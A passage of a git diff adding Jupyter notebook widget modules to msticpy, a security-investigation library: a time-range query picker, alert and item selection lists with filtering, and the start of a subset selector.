+            Max value
+
+        """
+        return self._total
+
+    def update_progress(self, new_total: int = 0, delta: int = 0):
+        """
+        Update progress UI by increment or new total.
+
+        Parameters
+        ----------
+        new_total : int, optional
+            New total, by default 0
+        delta : int, optional
+            Increment to update current total, by default 0
+
+        """
+        if new_total:
+            self._completed = new_total
+        else:
+            self._completed += delta
+        perc_total = int(100 * self._completed / self._total)
+        self._progress.value = perc_total
+        self._done_label.value = f"{perc_total}%"
+
+    def show(self):
+        """Make the controls visible."""
+        self._hide_show("visible")
+
+    def hide(self):
+        """Hide the controls."""
+        self._hide_show("hidden")
+
+    def _hide_show(self, visibility):
+        vis_layout = widgets.Layout(visibility=visibility)
+        self._progress.layout = vis_layout
+        self._done_label.layout = vis_layout
diff --git a/msticpy/nbtools/nbwidgets/query_time.py b/msticpy/nbtools/nbwidgets/query_time.py
new file mode 100644
index 000000000..cf4961f07
--- /dev/null
+++ b/msticpy/nbtools/nbwidgets/query_time.py
@@ -0,0 +1,333 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Module for pre-defined widget layouts."""
+from datetime import datetime, timedelta
+
+import ipywidgets as widgets
+from ipywidgets import Layout
+
+from ..._version import VERSION
+from ...common.timespan import TimeSpan
+from ...common.utility import check_kwargs
+from .core import (
+    IPyDisplayMixin,
+    RegisteredWidget,
+    TimeUnit,
+    default_before_after,
+    default_max_buffer,
+    parse_time_unit,
+)
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+# pylint: disable=too-many-instance-attributes
+class QueryTime(RegisteredWidget, IPyDisplayMixin):
+    """
+    QueryTime.
+
+    Composite widget to capture date and time origin
+    and set start and end times for queries.
+
+    See Also
+    --------
+    RegisteredWidget
+
+    """
+
+    _ALLOWED_KWARGS = [
+        "origin_time",
+        "before",
+        "after",
+        "start",
+        "end",
+        "max_before",
+        "max_after",
+        "label",
+        "description",
+        "units",
+        "auto_display",
+        "timespan",
+        "register",
+    ]
+
+    _label_style = {"description_width": "initial"}
+
+    IDS_ATTRIBS = [
+        "origin_time",
+        "before",
+        "after",
+        "_query_start",
+        "_query_end",
+        "_label",
+    ]
+
+    def __init__(
+        self,
+        **kwargs,
+    ):
+        """
+        Create new instance of QueryTime.
+
+        Parameters
+        ----------
+        origin_time : datetime, optional
+            The origin time (the default is `datetime.utcnow()`)
+        description : str, optional
+            The description to display
+            (the default is 'Select time ({units}) to look back')
+            label is an alias for this parameter
+        before : int, optional
+            The default number of `units` before the `origin_time`
+            (the default varies based on the unit)
+        after : int, optional
+            The default number of `units` after the `origin_time`
+            (the default varies based on the unit)
+        start : Union[datetime, str]
+            Start of query time - alternative to specifying origin,
+            before, after
+        end : Union[datetime, str]
+            End of query time - alternative to specifying origin,
+            before, after
+        timespan : TimeSpan
+            TimeSpan of query time - alternative to specifying origin,
+            before, after
+        max_before : int, optional
+            The largest value for `before` (the default varies based on the unit)
+        max_after : int, optional
+            The largest value for `after` (the default varies based on the unit)
+        units : str, optional
+            Time unit (the default is 'hour')
+            Permissable values are 'day', 'hour', 'minute', 'second',
+            'week'
+            These can all be abbreviated down to initial characters
+            ('d', 'm', etc.)
+        auto_display : bool, optional
+            Whether to display on instantiation (the default is False)
+
+        """
+        check_kwargs(kwargs, self._ALLOWED_KWARGS)
+        self._label = kwargs.pop(
+            "description", kwargs.pop("label", "Set query time boundaries")
+        )
+        self._time_unit = parse_time_unit(kwargs.get("units", "min"))
+
+        self.before = kwargs.pop("before", None)
+        self.after = kwargs.pop("after", None)
+        self._query_start = self._query_end = self.origin_time = datetime.utcnow
+        self._get_time_parameters(**kwargs)
+
+        self.max_before = kwargs.pop("max_before", None)
+        self.max_after = kwargs.pop("max_after", None)
+        self._adjust_max_before_after(self.max_before, self.max_after)
+
+        # Call superclass to register
+        ids_params = [
+            self.origin_time,
+            self.before,
+            self.after,
+            self.max_before,
+            self.max_after,
+            self._label,
+            self._time_unit,
+        ]
+
+        super().__init__(id_vals=ids_params, val_attrs=self.IDS_ATTRIBS, **kwargs)
+
+        # Create widgets
+        self._w_origin_dt = widgets.DatePicker(
+            description="Origin Date", disabled=False, value=self.origin_time.date()
+        )
+        self._w_origin_tm = widgets.Text(
+            description="Time (24hr)",
+            disabled=False,
+            value=str(self.origin_time.time()),
+        )
+
+        range_desc = "Time Range"
+        self._w_tm_range = widgets.IntRangeSlider(
+            value=(-self.before, self.after),
+            min=-self.max_before,
+            max=self.max_after,
+            step=1,
+            description=range_desc,
+            disabled=False,
+            continuous_update=True,
+            orientation="horizontal",
+            readout=True,
+            readout_format="d",
+            layout=Layout(width="70%"),
+            style=self._label_style,
+        )
+        # pylint: disable=no-member
+        self._w_time_unit = widgets.Dropdown(
+            options=[
+                unit.capitalize()
+                for unit, _ in TimeUnit.__members__.items()
+                if unit != "Second"
+            ],
+            value=self._time_unit.name.capitalize(),
+            layout=Layout(width="100px"),
+        )
+        # pylint: enable=no-member
+
+        self._w_start_time_txt = widgets.Text(
+            value=self._query_start.isoformat(sep=" "),
+            description="Query start time (UTC):",
+            layout=Layout(width="50%"),
+            style=self._label_style,
+        )
+        self._w_end_time_txt = widgets.Text(
+            value=self._query_end.isoformat(sep=" "),
+            description="Query end time (UTC) :  ",
+            layout=Layout(width="50%"),
+            style=self._label_style,
+        )
+
+        # Add change event handlers
+        self._w_tm_range.observe(self._time_range_change, names="value")
+        self._w_origin_dt.observe(self._update_origin, names="value")
+        self._w_origin_tm.observe(self._update_origin, names="value")
+        self._w_time_unit.observe(self._change_time_unit, names="value")
+
+        self.layout = self._create_layout()
+        if kwargs.pop("auto_display", False):
+            self.display()
+
+    def _create_layout(self):
+        return widgets.VBox(
+            [
+                widgets.HTML(f"<h4>{self._label}</h4>"),
+                widgets.HBox([self._w_origin_dt, self._w_origin_tm]),
+                widgets.VBox(
+                    [
+                        widgets.HBox([self._w_tm_range, self._w_time_unit]),
+                        self._w_start_time_txt,
+                        self._w_end_time_txt,
+                    ]
+                ),
+            ]
+        )
+
+    def _change_time_unit(self, change):
+        """Reset before/after and max buffers to defaults."""
+        unit = change["new"]
+        self._time_unit = parse_time_unit(unit)
+        self.before = default_before_after(default=None, unit=self._time_unit)
+        self.after = default_before_after(default=None, unit=self._time_unit)
+        self._adjust_max_before_after(max_before=None, max_after=None)
+        self._w_tm_range.value = (-self.before, self.after)
+        self._w_tm_range.min = -self.max_before
+        self._w_tm_range.max = self.max_after
+        self._query_start = self.origin_time + timedelta(
+            0, self._w_tm_range.value[0] * self._time_unit.value
+        )
+        self._query_end = self.origin_time + timedelta(
+            0, self._w_tm_range.value[1] * self._time_unit.value
+        )
+        self._w_start_time_txt.value = self._query_start.isoformat(sep=" ")
+        self._w_end_time_txt.value = self._query_end.isoformat(sep=" ")
+
+    def _get_time_parameters(self, **kwargs):
+        """Process different init time parameters."""
+        timespan: TimeSpan = kwargs.pop("timespan", None)
+        start = kwargs.pop("start", None)
+        end = kwargs.pop("end", None)
+        if timespan:
+            self._query_end = self.origin_time = timespan.end
+            self._query_start = timespan.start
+        elif start and end:
+            timespan = TimeSpan(start=start, end=end)
+            self._query_start = timespan.start
+            self._query_end = self.origin_time = timespan.end
+        else:
+            self.origin_time = kwargs.pop("origin_time", datetime.utcnow())
+            self.before = default_before_after(self.before, self._time_unit)
+            self.after = default_before_after(self.after, self._time_unit)
+            # Calculate time offsets from origin
+            self._query_start = self.origin_time - timedelta(
+                0, self.before * self._time_unit.value
+            )
+            self._query_end = self.origin_time + timedelta(
+                0, self.after * self._time_unit.value
+            )
+            timespan = TimeSpan(start=self._query_start, end=self._query_end)
+        if "units" not in kwargs:
+            self._infer_time_units()
+        if self.after is None:
+            self.after = 0
+        if self.before is None:
+            self.before = int(
+                (self._query_end - self._query_start).total_seconds()
+                / self._time_unit.value
+            )
+
+    def _infer_time_units(self):
+        # If time units not set explicitly, set to something sensible,
+        # based on start/end times
+        if abs(self.timespan.period.days) > 1:
+            self._time_unit = TimeUnit.DAY
+        elif abs(self.timespan.period.total_seconds()) > 3600:
+            self._time_unit = TimeUnit.HOUR
+        else:
+            self._time_unit = TimeUnit.MINUTE
+
+    def _adjust_max_before_after(self, max_before, max_after):
+        """Adjust the max values so the are always bigger than the defaults."""
+        self.max_before = default_max_buffer(
+            max_before, self.before or 1, self._time_unit
+        )
+        self.max_after = default_max_buffer(max_after, self.after or 1, self._time_unit)
+
+    def _update_origin(self, change):
+        del change
+        try:
+            tm_value = datetime.strptime(self._w_origin_tm.value, "%H:%M:%S.%f").time()
+            self.origin_time = datetime.combine(self._w_origin_dt.value, tm_value)
+            self._time_range_change(change=None)
+        except (ValueError, TypeError):
+            # reset on error
+            self._w_origin_dt.value = self.origin_time.date()
+            self._w_origin_tm = self.origin_time.time()
+
+    def _time_range_change(self, change):
+        del change
+        self._query_start = self.origin_time + timedelta(
+            0, self._w_tm_range.value[0] * self._time_unit.value
+        )
+        self._query_end = self.origin_time + timedelta(
+            0, self._w_tm_range.value[1] * self._time_unit.value
+        )
+        self._w_start_time_txt.value = self._query_start.isoformat(sep=" ")
+        self._w_end_time_txt.value = self._query_end.isoformat(sep=" ")
+        self.before = abs(self._w_tm_range.value[0])
+        self.after = abs(self._w_tm_range.value[1])
+
+    @property
+    def start(self):
+        """Query start time."""
+        return self._query_start
+
+    @property
+    def end(self):
+        """Query end time."""
+        return self._query_end
+
+    @property
+    def units(self):
+        """Time units used by control."""
+        return self._time_unit.name.capitalize()
+
+    @property
+    def timespan(self):
+        """Return the timespan as a TimeSpan object."""
+        return TimeSpan(start=self.start, end=self.end)
+
+    @property
+    def value(self):
+        """Return the timespan as a TimeSpan object."""
+        return self.timespan
diff --git a/msticpy/nbtools/nbwidgets/select_alert.py b/msticpy/nbtools/nbwidgets/select_alert.py
new file mode 100644
index 000000000..5870a4ed5
--- /dev/null
+++ b/msticpy/nbtools/nbwidgets/select_alert.py
@@ -0,0 +1,331 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Module for pre-defined widget layouts."""
+import json
+import random
+from json import JSONDecodeError
+from typing import Any, Callable, List, Optional, Tuple
+
+import ipywidgets as widgets
+import pandas as pd
+from deprecated.sphinx import deprecated
+from IPython.display import HTML, display
+from ipywidgets import Layout
+
+from ..._version import VERSION
+from .core import IPyDisplayMixin
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+# pylint: disable=too-many-instance-attributes
+class SelectAlert(IPyDisplayMixin):
+    """
+    Alert Selector.
+
+    View list of alerts and select one for investigation.
+    Optionally provide and action to call with the selected alert as a parameter
+    (typically used to display the alert.)
+
+    Attributes
+    ----------
+    selected_alert : SecurityAlert
+        The selected alert
+    alert_id : str
+        The SystemAlertId of the selected alert
+    alerts : List[SecurityAlert]
+        The current alert list (DataFrame)
+    action : Callable[..., Optional[Tuple[...]]]
+        The callback action to execute on selection
+        of an alert.
+
+    """
+
+    _ALERTID_REGEX = r"\[id:(?P<alert_id>.*)\]$"
+
+    def __init__(
+        self,
+        alerts: pd.DataFrame,
+        action: Callable[..., Optional[Tuple]] = None,
+        columns: List[str] = None,
+        time_col: str = "StartTimeUtc",
+        id_col: str = "SystemAlertId",
+        auto_display: bool = False,
+    ):
+        """
+        Create a new instance of AlertSelector.
+
+        Parameters
+        ----------
+        alerts : pd.DataFrame
+            DataFrame of alerts.
+        action : Callable[..., Optional[Tuple]], optional
+            Optional function to execute for each selected alert.
+            If the function returns one or a tuple of displayable objects
+            these will be displayed.
+        columns : List[str], optional
+            Override the default column names to use from `alerts`
+            (the default is ['StartTimeUtc', 'AlertName',
+            'CompromisedEntity', 'SystemAlertId'])
+        time_col : str, optional
+            The column in your alerts that determines when it was created
+            Default is 'StartTimeUtc'.
+        id_col : str, optional
+            The column in your data that determines the alert id
+            Default is 'SystemAlertId'.
+        auto_display : bool, optional
+            Whether to display on instantiation (the default is False)
+
+        """
+        self.alerts = alerts
+        self.alert_action = action
+        self.id_col = id_col
+        self.time_col = time_col
+
+        self.columns = columns or [
+            "AlertName",
+            "CompromisedEntity",
+        ]
+
+        alert_cols = self.columns
+        if self.time_col not in alert_cols:
+            alert_cols.append(self.time_col)
+        if self.id_col not in alert_cols:
+            alert_cols.append(self.id_col)
+        items = alerts[alert_cols].sort_values(time_col, ascending=True)
+        self._select_items = items.apply(
+            self._alert_summary,
+            axis=1,
+            time_col=self.time_col,
+            id_col=self.id_col,
+            columns=self.columns,
+        ).values.tolist()
+
+        self.selected_alert = None
+        self.alert_id = None
+
+        self._w_select_alert = widgets.Select(
+            options=self._select_items,
+            description="Select alert :",
+            layout=Layout(width="95%", height="300px"),
+            style={"description_width": "initial"},
+        )
+
+        self._w_filter_alerts = widgets.Text(
+            value="",
+            description="Filter alerts by title:",
+            style={"description_width": "initial"},
+        )
+
+        # setup to use updatable display objects
+        rand_id = random.randint(0, 999999)  # nosec
+        self._output_id = f"{self.__class__.__name__}_{rand_id}"
+        self._disp_elems: List[Any] = []
+
+        # set up observer callbacks
+        self._w_filter_alerts.observe(self._update_options, names="value")
+        self._w_select_alert.observe(self._select_alert, names="value")
+        wgt_list = [self._w_filter_alerts, self._w_select_alert]
+        self._w_display_details = widgets.Checkbox(
+            value=True,
+            description="Display details",
+        )
+        if action:
+            self._w_display_details.observe(self._run_action, names="value")
+            wgt_list.append(self._w_display_details)
+        self.layout = widgets.VBox(wgt_list)
+
+        if auto_display:
+            self.display()
+
+    @property
+    def value(self):
+        """Return selected alert."""
+        return self.selected_alert
+
+    def display(self):
+        """Display the interactive widgets."""
+        super().display()
+        display(HTML("<hr>"))
+        self._select_top_alert()
+
+    @staticmethod
+    def _alert_summary(alert_row, time_col, id_col, columns):
+        """Return summarized string of alert properties."""
+        item = f"{alert_row[time_col]}"
+        for col in columns:
+            item += f" - {alert_row[col]}"
+        item += f" - {alert_row[id_col]}"
+        return item
+
+    def _update_options(self, change):
+        """Filter the alert list by substring."""
+        if change is not None and "new" in change:
+            self._w_select_alert.options = [
+                alert_dtl
+                for alert_dtl in self._select_items
+                if change["new"].lower() in alert_dtl[0].lower()
+            ]
+
+    def _select_alert(self, selection=None):
+        """Select action triggered by picking item from list."""
+        if (
+            selection is None
+            or "new" not in selection
+            or not isinstance(selection["new"], str)
+        ):
+            self.selected_alert = None
+        else:
+            self.alert_id = selection["new"].split("- ")[-1]
+
+            self.selected_alert = self._get_alert(self.alert_id)
+            if self.alert_action is not None:
+                self._run_action()
+
+    def _get_alert(self, alert_id):
+        """Get the alert by alert_id."""
+        self.alert_id = alert_id
+        selected_alerts = self.alerts[self.alerts[self.id_col] == alert_id]
+        if selected_alerts.shape[0] > 0:
+            alert = pd.Series(selected_alerts.iloc[0])
+            if "ExtendedProperties" in alert.index and isinstance(
+                alert["ExtendedProperties"], str
+            ):
+                try:
+                    alert["ExtendedProperties"] = json.loads(
+                        (alert["ExtendedProperties"])
+                    )
+                except JSONDecodeError:
+                    pass
+            if "Entities" in alert.index and isinstance(alert["Entities"], str):
+                try:
+                    alert["Entities"] = json.loads((alert["Entities"]))
+                except JSONDecodeError:
+                    pass
+            return alert
+        return None
+
+    def _select_top_alert(self):
+        """Select the first alert by default."""
+        top_alert = self.alerts.iloc[0]
+        if not top_alert.empty:
+            self._w_select_alert.value = self._w_select_alert.options[0]
+            self.alert_id = top_alert[self.id_col]
+            self.selected_alert = self._get_alert(self.alert_id)
+            if self.alert_action is not None:
+                self._run_action()
+
+    def _run_action(self, change=None):
+        """Run any action function and display details, if any."""
+        del change
+        output_objs = None
+        if self._w_display_details.value:
+            output_objs = self.alert_action(self.selected_alert)
+        if output_objs is None:
+            self._clear_display()
+            return
+        if not isinstance(output_objs, (tuple, list)):
+            output_objs = [output_objs]
+        display_objs = bool(self._disp_elems)
+        for idx, out_obj in enumerate(output_objs):
+            if not display_objs:
+                self._disp_elems.append(
+                    display(out_obj, display_id=f"{self._output_id}_{idx}")
+                )
+            elif idx == len(self._disp_elems):
+                break
+            else:
+                self._disp_elems[idx].update(out_obj)
+
+    def _clear_display(self):
+        """Clear any current details."""
+        if not self._disp_elems:
+            return
+        for disp_obj in self._disp_elems:
+            disp_obj.update(HTML(""))
+
+
+# pylint: disable=too-many-instance-attributes
+@deprecated(
+    reason="Superceded by SelectAlert. Please use that version", version="0.5.2"
+)
+class AlertSelector(SelectAlert):
+    """
+    AlertSelector.
+
+    View list of alerts and select one for investigation.
+    Optionally provide and action to call with the selected alert as a parameter
+    (typically used to display the alert.)
+
+    Attributes
+    ----------
+    selected_alert : SecurityAlert
+        The selected alert
+    alert_id : str
+        The SystemAlertId of the selected alert
+    alerts : List[SecurityAlert]
+        The current alert list (DataFrame)
+    action : Callable[..., None]
+        The callback action to execute on selection
+        of an alert.
+
+    """
+
+    def __init__(
+        self,
+        alerts: pd.DataFrame,
+        action: Callable[..., None] = None,
+        columns: List[str] = None,
+        auto_display: bool = False,
+    ):
+        """
+        Create a new instance of AlertSelector.
+
+        Parameters
+        ----------
+        alerts : pd.DataFrame
+            DataFrame of alerts.
+        action : Callable[..., None], optional
+            Optional function to execute for each selected alert.
+            (the default is None)
+        columns : List[str], optional
+            Override the default column names to use from `alerts`
+            (the default is ['StartTimeUtc', 'AlertName',
+            'CompromisedEntity', 'SystemAlertId'])
+        auto_display : bool, optional
+            Whether to display on instantiation (the default is False)
+
+        """
+        self._w_output = widgets.Output(layout={"border": "1px solid black"})
+        super().__init__(
+            alerts=alerts, action=action, columns=columns, auto_display=auto_display
+        )
+
+    def display(self):
+        """Display the interactive widgets."""
+        self._select_top_alert()
+        display(
+            widgets.VBox([self._w_filter_alerts, self._w_select_alert, self._w_output])
+        )
+
+    def _run_action(self, change=None):
+        del change
+        self._w_output.clear_output()
+        with self._w_output:
+            self.alert_action(self.selected_alert)
+
+    @property
+    def query_params(self):
+        """
+        Query parameters derived from alert.
+
+        Returns
+        -------
+            dict(str, str) -- Dictionary of parameter names
+
+        """
+        return {"provider_alert_id": self.alert_id}
diff --git a/msticpy/nbtools/nbwidgets/select_item.py b/msticpy/nbtools/nbwidgets/select_item.py
new file mode 100644
index 000000000..59fea9c13
--- /dev/null
+++ b/msticpy/nbtools/nbwidgets/select_item.py
@@ -0,0 +1,318 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Module for pre-defined widget layouts."""
+import random
+from typing import Any, Callable, List, Dict, Optional, Tuple, Union
+
+import ipywidgets as widgets
+from deprecated.sphinx import deprecated
+from IPython.display import HTML, display
+from ipywidgets import Layout
+
+from ..._version import VERSION
+from .core import IPyDisplayMixin
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+class SelectItem(IPyDisplayMixin):
+    """
+    Selection list from list or dict.
+
+    Attributes
+    ----------
+    value : Any
+        The selected value.
+    item_action : Callable[..., Optional[Tuple]]
+        Action to call for each selection.
+
+    """
+
+    # pylint: disable=too-many-arguments, too-few-public-methods
+    def __init__(
+        self,
+        description: str = "Select an item",
+        options: Union[List[str], Dict[str, Any]] = None,
+        action: Callable[..., Optional[Tuple]] = None,
+        value: str = "",
+        **kwargs,
+    ):
+        """
+        Select an item from a list or dict.
+
+        Parameters
+        ----------
+        description : str, optional
+            The widget label to display.
+            (the default is 'Select an item')
+        options : Union[List[str], Dict[str, Any]]
+            Either:
+            A `list` of items to select from (the default is None)
+            A `dict` of items to select from. When using `item_dict`
+            the values are displayed as the selectable items and key
+            corresponding to the selected value is set as the `value`
+            property.
+        action : Callable[..., Optional[Tuple[...]]], optional
+            function to call when item selected (passed a single
+            parameter - the value of the currently selected item)
+            (the default is None).
+            If the function returns one or a tuple of displayable objects
+            these will be displayed.
+        value : str, optional
+            A default value to pre-populate the filter with.
+
+        Other Parameters
+        ----------------
+        item_list : List[str], optional
+            A `list` of items to select from (the default is None)
+        item_dict : Dict[str, str], optional
+            A `dict` of items to select from. When using `item_dict`
+            the keys are displayed as the selectable items and value
+            corresponding to the selected key is set as the `value`
+            property.
+            (the default is None)
+        auto_display : bool, optional
+            Whether to display on instantiation (the default is False)
+        height : str, optional
+            Selection list height (the default is '100px')
+        width : str, optional
+            Selection list width (the default is '50%')
+        display_filter : bool, optional
+            Whether to display item filter (the default is True)
+
+        """
+        self.options = options or kwargs.pop("item_list", [])
+        self.options = self.options or kwargs.pop("item_dict", {})
+
+        if not self.options:
+            raise ValueError("No options supplied for SelectItem.")
+        auto_display = kwargs.pop("auto_display", False)
+        height: str = kwargs.pop("height", "100px")
+        width: str = kwargs.pop("width", "50%")
+        display_filter: bool = kwargs.pop("display_filter", True)
+
+        self.def_value = value
+        if self.def_value not in self.options:
+            if isinstance(self.options, list):
+                self.def_value = next(iter(self.options))
+            else:
+                self.def_value = next(iter(self.options.values()))
+
+        self._wgt_select = widgets.Select(
+            value=self.def_value,
+            options=self._get_filtered_options(),
+            description=description,
+            layout=Layout(width=width, height=height),
+            style={"description_width": "initial"},
+        )
+        self._w_display_details = widgets.Checkbox(
+            value=True,
+            description="Display details",
+        )
+        self._display_filter = display_filter
+        if display_filter:
+            self._w_filter = widgets.Text(
+                value=self.label,
+                description="Filter:",
+                style={"description_width": "initial"},
+            )
+
+            # set up observer callbacks
+            self._w_filter.observe(self._filter_options, names="value")
+        self._wgt_select.observe(self._select_item, names="value")
+
+        if action:
+            self._w_display_details.observe(self._run_action, names="value")
+        self.item_action = action
+
+        # setup to use updatable display objects
+        rand_id = random.randint(0, 999999)  # nosec
+        self._output_id = f"{self.__class__.__name__}_{rand_id}"
+        self._disp_elems: List[Any] = []
+
+        if auto_display:
+            self.display()
+
+    @property
+    def layout(self):
+        """Return underlying widget collection."""
+        wgt_list = []
+        if self._display_filter:
+            wgt_list.append(self._w_filter)
+        wgt_list.append(self._wgt_select)
+        if self.item_action:
+            wgt_list.append(self._w_display_details)
+        return widgets.VBox(wgt_list)
+
+    @property
+    def value(self):
+        """Return the currently selected item."""
+        return self._wgt_select.value
+
+    @value.setter
+    def value(self, value):
+        """Set to key or value of options."""
+        if value in self.options:
+            self._wgt_select.label = value
+        if isinstance(self.options, dict) and value in self.options.values():
+            self._wgt_select.value = value
+
+    @property
+    def label(self):
+        """Return current display item."""
+        return self._wgt_select.label
+
+    def display(self):
+        """Display the interactive widget."""
+        super().display()
+        display(HTML("<hr>"))
+        self._show_top_item()
+
+    def _select_item(self, selection):
+        """Run action if available."""
+        del selection
+        if self.item_action is not None:
+            self._run_action()
+
+    def _filter_options(self, change):
+        """Filter the alert list by substring."""
+        if change is None or "new" not in change:
+            return
+        self._wgt_select.options = self._get_filtered_options(change["new"])
+
+    def _get_filtered_options(
+        self, substring: str = ""
+    ) -> List[Union[str, Tuple[str, str]]]:
+        """Return optionally filtered list of option tuples."""
+        if self.options is None:
+            return []
+        if isinstance(self.options, list):
+            return [val for val in self.options if substring.casefold() in val.lower()]
+        return [
+            (lab, val)
+            for lab, val in self.options.items()
+            if substring.casefold() in lab.lower()
+        ]
+
+    def _run_action(self, change=None):
+        """Run any action function and display details, if any."""
+        del change
+        output_objs = None
+        if self._w_display_details.value:
+            output_objs = self.item_action(self.value)
+        if output_objs is None:
+            self._clear_display()
+            return
+        if not isinstance(output_objs, (tuple, list)):
+            output_objs = [output_objs]
+        display_objs = dict(enumerate(self._disp_elems))
+        for idx, out_obj in enumerate(output_objs):
+            if idx not in display_objs:
+                self._disp_elems.append(
+                    display(out_obj, display_id=f"{self._output_id}_{idx}")
+                )
+            else:
+                self._disp_elems[idx].update(out_obj)
+
+    def _clear_display(self):
+        """Clear any current details."""
+        if not self._disp_elems:
+            return
+        for disp_obj in self._disp_elems:
+            disp_obj.update(HTML(""))
+
+    def _show_top_item(self):
+        """Run action on the first item by default."""
+        if self.item_action is not None and self.value is not None:
+            self._run_action()
+
+
+@deprecated(reason="Superceded by SelectItem. Please use that version", version="0.5.2")
+class SelectString(SelectItem):
+    """
+    Selection list from list or dict.
+
+    Attributes
+    ----------
+    value : Any
+        The selected value.
+    item_action : Callable[..., None]
+        Action to call for each selection.
+
+    """
+
+    # pylint: disable=too-many-arguments, too-few-public-methods
+    def __init__(
+        self,
+        description: str = "Select an item",
+        item_list: List[str] = None,
+        action: Callable[..., None] = None,
+        item_dict: Dict[str, str] = None,
+        auto_display: bool = False,
+        height: str = "100px",
+        width: str = "50%",
+        display_filter: bool = True,
+    ):
+        """
+        Select an item from a list or dict.
+
+        Parameters
+        ----------
+        description : str, optional
+            The widget label to display.
+            (the default is 'Select an item')
+        item_list : List[str], optional
+            A `list` of items to select from (the default is None)
+        item_dict : Dict[str, str], optional
+            A `dict` of items to select from. When using `item_dict`
+            the keys are displayed as the selectable items and value
+            corresponding to the selected key is set as the `value`
+            property.
+            (the default is None)
+        action : Callable[..., None], optional
+            function to call when item selected (passed a single
+            parameter - the value of the currently selected item)
+            (the default is None)
+        auto_display : bool, optional
+            Whether to display on instantiation (the default is False)
+        height : str, optional
+            Selection list height (the default is '100px')
+        width : str, optional
+            Selection list width (the default is '50%')
+        display_filter : bool, optional
+            Whether to display item filter (the default is True)
+
+        """
+        self._w_output = widgets.Output(layout={"border": "1px solid black"})
+
+        super().__init__(
+            description=description,
+            item_list=item_list,
+            item_dict=item_dict,
+            action=action,
+            auto_display=auto_display,
+            height=height,
+            width=width,
+            display_filter=display_filter,
+        )
+
+    def _run_action(self, change=None):
+        del change
+        self._w_output.clear_output()
+        with self._w_output:
+            self.item_action(self.value)
+
+    def display(self):
+        """Display the interactive widget."""
+        self._show_top_item()
+        wgt_list = []
+        if self._display_filter:
+            wgt_list.append(self._w_filter)
+        wgt_list.append(self._wgt_select)
+        if self.item_action:
+            wgt_list.append(self._w_output)
+        display(widgets.VBox(wgt_list))
diff --git a/msticpy/nbtools/nbwidgets/select_subset.py b/msticpy/nbtools/nbwidgets/select_subset.py
new file mode 100644
index 000000000..dabd11af2
--- /dev/null
+++ b/msticpy/nbtools/nbwidgets/select_subset.py
@@ -0,0 +1,196 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Module for pre-defined widget layouts."""
+from typing import Any, Dict, List, Union
+
+import ipywidgets as widgets
+
+from ..._version import VERSION
+from .core import IPyDisplayMixin
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+# pylint: disable=too-many-instance-attributes
+class SelectSubset(IPyDisplayMixin):
+    """Class to select a subset from an input list."""
+
+    def __init__(
+        self,
+        source_items: Union[Dict[str, str], List[Any]],
+        default_selected: Union[Dict[str, str], List[Any]] = None,
+        display_filter: bool = True,
+        auto_display: bool = True,
+    ):
+        """
+        Create instance of SelectSubset widget.
+
+        Parameters
+        ----------
+        source_items : Union[Dict[str, str], List[Any]]
+            List of source items - either a dictionary(label, value),
+            a simple list or
+            a list of (label, value) tuples.
+        default_selected : Union[Dict[str, str], List[Any]]
+            Populate the selected list with values - either
+            a dictionary(label, value),
+            a simple list or
+            a list of (label, value) tuples.
+        display_filter : bool, optional
+            Whether to display item filter (the default is True)
+        auto_display : bool, optional
+            Whether to display on instantiation (the default is True)
+
+        """
+        if isinstance(source_items, dict):
+            source_items = list(source_items.items())
+
+        self.src_items = sorted(set(source_items))
+        if isinstance(self.src_items[0], tuple):
+            self._src_dict = {val: (label, val) for label, val in self.src_items}
+        else:
+            self._src_dict = {}
+
+        w_layout = widgets.Layout(width="40%", height="200px")
+        self._source_list = widgets.SelectMultiple(
+            options=sorted(set(self.src_items)), layout=w_layout, description="Source: "
+        )
+
+        if isinstance(default_selected, dict):
+            default_selected = list(default_selected.items())
+        if default_selected:
+            set_selected = set(default_selected)
+            selected_items = sorted(set_selected.intersection(source_items))
+        else:
+            selected_items = []
+
+        self._select_list = widgets.SelectMultiple(
+            options=selected_items, layout=w_layout, description="Selected: "
+        )
+
+        self._display_filter = display_filter
+        if display_filter:
+            self._w_filter = widgets.Text(
+                value="", description="Filter:", style={"description_width": "initial"}
+            )
+
+            # set up observer callbacks
+            self._w_filter.observe(self._update_options, names="value")
+
+        self._b_add_all = widgets.Button(description="Add All \u21fe")
+        self._b_add = widgets.Button(description="Add \u21fe")
+        self._b_del = widgets.Button(description="\u21fd Remove")
+        self._b_del_all = widgets.Button(description="\u21fd Remove All")
+
+        self._b_add.on_click(self._on_btn_add)
+        self._b_del.on_click(self._on_btn_del)
+        self._b_del_all.on_click(self._on_btn_del_all)
+        self._b_add_all.on_click(self._on_btn_add_all)
+
+        v_box = widgets.VBox(
+            [self._b_add_all, self._b_add, self._b_del, self._b_del_all]
+        )
+        self.layout = widgets.HBox([self._source_list, v_box, self._select_list])
+        if self._display_filter:
+            self.layout = widgets.VBox([self._w_filter, self.layout])
+        if auto_display:
+            self.display()
+
+    @property
+    def value(self) -> List[Any]:
+        """Return currently selected value or values."""
+        return self.selected_values
+
+    @property
+    def selected_items(self) -> List[Any]:
+        """
+        Return a list of the selected items.
+
+        If the input list is a list of tuples, this returns
+        a list of the selected tuples.
+
+        Returns
+        -------
+        List[Any]
+            List of items in the selected list.
+
+        """
+        return list(self._select_list.options)
+
+    @property
+    def selected_values(self) -> List[Any]:
+        """
+        Return list of selected values.
+
+        If the input list is a list of tuples, this returns
+        a list of values of the items.
+
+        Returns
+        -------
+        List[Any]
+            List of selected item values.
+
+        """
+        if self._select_list.options and isinstance(
+            self._select_list.options[0], tuple
+        ):
+            return [item[1] for item in self._select_list.options]
+        return self.selected_items
+
+    def _update_options(self, change):
